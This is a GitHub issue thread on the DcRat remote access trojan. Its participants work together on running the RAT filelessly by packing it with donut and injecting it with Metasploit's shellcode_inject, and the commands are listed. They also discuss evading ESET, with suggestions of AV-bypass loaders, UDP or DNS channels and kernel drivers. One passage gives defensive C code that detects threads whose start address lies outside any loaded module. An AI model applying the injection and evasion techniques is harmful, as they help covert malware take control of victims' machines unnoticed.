Comments (20)
I've tried donut; the problem may be caused by the unsafe code.
https://github.com/qwqdanchun/DcRat/blob/main/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/UnsafeCodecs/UnsafeStreamCodec.cs
You will find some native code in remotedesktop.dll.
from dcrat.
Maybe look at this project:
https://github.com/qwqdanchun/Bypass
It shows how to code a loader to bypass AV.
Change the way of encryption, and enjoy it.
from dcrat.
Unsafe code -> Is it impossible to convert it to safe code?
Can't it be fixed in UnsafeStreamCodec.cs?
The fileless technique I tested is:
Compile it to a donut and run the commands below.
Metasploit commands:
    use post/windows/manage/shellcode_inject
    set AUTOUNHOOK false
    set CHANNELIZED false
    set INTERACTIVE false
    set pid 0
    set shellcode /root/payload.bin
    set session 1   (session number)
    run
from dcrat.
In the case of a Quasar remote, viewing the screen is possible.
There seems to be something different.
from dcrat.
Sorry for what I said before.
I made a payload.bin with donut and tested it with a C# loader and a C++ loader just now.
Both work well, so it may not be because of the unsafe code.
I don't have msf on my PC, so I can't test the shellcode_inject module.
Have you ever tried any shellcode loader?
from dcrat.
You don't have to use Metasploit.
You can also create a thread after copying the donut-compressed program to memory.
Something that can be said for sure:
Quasar remote viewing is possible.
I have no idea how to solve this problem.
Thanks for the help.
from dcrat.
pid 0 runs notepad.exe -> memory injection into a new notepad process.
You can also specify the pid.
from dcrat.
Try changing the pid.
I found that this article says (translated from Chinese): "When injecting into a process, I found that injection into notepad.exe cannot execute, but injection into PowerShell can execute."
https://www.freebuf.com/articles/system/234365.html
from dcrat.
The process does not matter if it is in the same window session.
explorer.exe, RuntimeBroker.exe, notepad.exe etc. -> all impossible.
Remote viewing of Quasar is possible.
In UnsafeStreamCodec.cs, Quasar has several different parts.
I don't know why this is not possible from the async remote.
from dcrat.
Try PowerShell; maybe it's because of the CLR?
from dcrat.
I can't find why it doesn't work.
from dcrat.
Quasar source works fine.
This is the source with a try and some additions.
The screen is now displayed normally.
############################################################
https://www.eset.com/us/home/free-trial/
ESET antivirus detects it as MSIL/Agent.
ESET detects it unconditionally when it connects the TCP socket.
Do you know how to bypass ESET's TCP detection?
The screen output problem was solved lol
ClientSocket.cs
    foreach (IPAddress theaddress in addresslist)
    {
        try
        {
            TcpClient.Connect(theaddress, ServerPort); // TCP connect: this is where ESET antivirus detects it
            if (TcpClient.Connected) break;
        }
        catch { }
    }
from dcrat.
Thank you for your code.
I'll push it later.
If you'd like to bypass TCP detection, you may change it to UDP or DNS and so on.
After installing ESET in a VM, I tested the RAT. It didn't detect the TCP connect. Don't know why.
However, sadly, many plugins may be detected.
Maybe I should rewrite some plugins later.
from dcrat.
Not detected as exe execution.
Memory area detection:
- Copy the donut-packed program into memory and create a thread
- Connect TCP in the created thread
- It detects the TCP connect from memory
Normal exe execution is not detected.
The fileless technique bypasses 90% of antivirus.
I am curious if there is any new detection technique.
Thank you
#############################################
Thanks for any hints on the screen viewing problem (unsafe code memory).
I don't know how to bypass ESET.
from dcrat.
ESET's scan is powerful.
Maybe it disables TCP connect from processes like notepad?
This is my guess.
from dcrat.
Because it didn't detect the TCP connect when you just ran it as an exe.
from dcrat.
https://github.com/BlackINT3/OpenArk/releases/tag/v1.1.0
ObRegisterCallbacks in the kernel.
If you disable the LoadImage kernel part to work with OpenArk,
it can't be detected.
It seems to be detected if the running thread's image address is not normal.
Create a thread and it detects that the image address value is abnormal!
from dcrat.
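The check the comment above describes, a thread whose start address is not inside the image of any loaded module, can be reproduced from the defender's side in user mode. The following is an added example written for this thread; it is not code from DcRat, OpenArk or ESET. It walks the threads of one process, asks for each thread's Win32 start address via NtQueryInformationThread (information class 9, ThreadQuerySetWin32StartAddress), and flags any thread whose start address is not backed by a module from EnumProcessModulesEx. The portable part (the range check) is kept separate from the Windows-only enumeration so it can be tested anywhere. Assumptions: the caller can open the target pid with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, and the 1024-entry module buffer is a chosen limit, not a Windows constant.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Image range of one loaded module: [base, base + size). */
struct module_range {
    uintptr_t base;
    size_t    size;
};

/* Portable core: 1 if addr lies inside some loaded module's image, else 0.
 * A thread started on a VirtualAlloc'd buffer holding a donut blob is the
 * "abnormal image address" the comment above says ESET keys on. */
int start_address_is_backed(uintptr_t addr,
                            const struct module_range *mods, size_t nmods)
{
    for (size_t i = 0; i < nmods; i++)
        if (addr >= mods[i].base && addr - mods[i].base < mods[i].size)
            return 1;
    return 0;
}

/* How many of the given thread start addresses are not backed by a module. */
size_t count_unbacked(const uintptr_t *starts, size_t nstarts,
                      const struct module_range *mods, size_t nmods)
{
    size_t bad = 0;
    for (size_t i = 0; i < nstarts; i++)
        if (!start_address_is_backed(starts[i], mods, nmods))
            bad++;
    return bad;
}

#ifdef _WIN32
#include <windows.h>
#include <tlhelp32.h>
#include <psapi.h>
/* Undocumented but long-stable: NtQueryInformationThread class 9 returns the
 * Win32 start address the thread was created with. Resolved from ntdll. */
#define ThreadQuerySetWin32StartAddress 9
typedef LONG (NTAPI *NtQIT_t)(HANDLE, ULONG, PVOID, ULONG, PULONG);

/* Collect the image range of every module loaded in hProc (cap is our own limit). */
static size_t collect_modules(HANDLE hProc, struct module_range *mods, size_t cap)
{
    HMODULE hm[1024];
    DWORD needed = 0;
    if (!EnumProcessModulesEx(hProc, hm, sizeof hm, &needed, LIST_MODULES_ALL))
        return 0;
    size_t n = needed / sizeof(HMODULE), out = 0;
    if (n > cap) n = cap;
    for (size_t i = 0; i < n; i++) {
        MODULEINFO mi;
        if (GetModuleInformation(hProc, hm[i], &mi, sizeof mi)) {
            mods[out].base = (uintptr_t)mi.lpBaseOfDll;
            mods[out].size = mi.SizeOfImage;
            out++;
        }
    }
    return out;
}

/* Walk every thread of pid and report those with an unbacked start address. */
static size_t scan_process(DWORD pid)
{
    static struct module_range mods[1024];
    HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);
    if (!hProc) { fprintf(stderr, "OpenProcess(%lu) failed: %lu\n", pid, GetLastError()); return 0; }
    size_t nmods = collect_modules(hProc, mods, 1024);
    NtQIT_t NtQIT = (NtQIT_t)GetProcAddress(GetModuleHandleA("ntdll.dll"),
                                           "NtQueryInformationThread");
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    THREADENTRY32 te = { .dwSize = sizeof te };
    size_t flagged = 0;
    for (BOOL ok = Thread32First(snap, &te); ok; ok = Thread32Next(snap, &te)) {
        if (te.th32OwnerProcessID != pid) continue;
        HANDLE hThr = OpenThread(THREAD_QUERY_INFORMATION, FALSE, te.th32ThreadID);
        if (!hThr) continue;
        PVOID start = NULL;
        if (NtQIT && NtQIT(hThr, ThreadQuerySetWin32StartAddress, &start, sizeof start, NULL) == 0
            && !start_address_is_backed((uintptr_t)start, mods, nmods)) {
            printf("pid %lu tid %lu: start %p is not inside any loaded module\n",
                   pid, te.th32ThreadID, start);
            flagged++;
        }
        CloseHandle(hThr);
    }
    CloseHandle(snap);
    CloseHandle(hProc);
    return flagged;
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <pid>\n", argv[0]); return 2; }
    return scan_process((DWORD)strtoul(argv[1], NULL, 10)) ? 1 : 0;
}
#endif
```

Build on Windows with `cl thread_scan.c` or `gcc thread_scan.c -lpsapi` and run it against the pid of the injected notepad.exe; the thread created on the donut buffer shows up with a start address outside every module. Two caveats a practitioner should keep in mind: this runs after the fact from ring 3, whereas the comment describes ESET reacting in the kernel at thread creation, and legitimately JIT-compiled code (the CLR, for one) also lives outside any module image, so an unbacked start address is a strong signal in an unmanaged process and a weaker one in a managed host like powershell.exe.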
Good work!
However, this is hard to bypass.
from dcrat.
Usually you can't disable it in ring 3.
from dcrat.
ESET is a good antivirus.
If you load a driver in ring 0 it will probably be bypassed easily.
To go from a normal computer user to system privilege, you must also escalate privileges and manipulate tokens.
Ring 3 seems to need an idea.
Thanks for the reply.
from dcrat.